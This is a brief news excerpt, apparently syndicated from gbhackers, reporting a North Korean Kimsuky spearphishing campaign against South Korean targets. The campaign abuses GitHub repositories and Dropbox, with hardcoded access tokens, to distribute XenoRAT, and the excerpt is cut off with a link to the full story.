North Korean Hackers Weaponize GitHub Infrastructure to Distribute Malware
gbhackers
Cybersecurity researchers have uncovered a sophisticated spearphishing campaign orchestrated by the North Korean threat group Kimsuky, leveraging GitHub as a critical piece of attack infrastructure to distribute malware since March 2025.
This operation, identified through analysis of a malicious PowerShell script posted on X, showcases an alarming abuse of legitimate platforms like GitHub and Dropbox to host and disseminate malicious payloads, including the open-source XenoRAT.
Sophisticated Spearphishing Campaign
The attackers embedded hardcoded GitHub Personal Access Tokens (PATs) with repository scope in the malware, granting read and write access to private repositories used as command and control (C&C) infrastructure for storing malware, decoy files, and exfiltrated victim data.
The attack begins with spearphishing emails tailored to specific South Korean targets, often impersonating trusted entities like law firms or financial authorities.
These emails contain password-protected archives with malicious attachments, designed ...
Copyright of this story solely belongs to gbhackers . To see the full text click HERE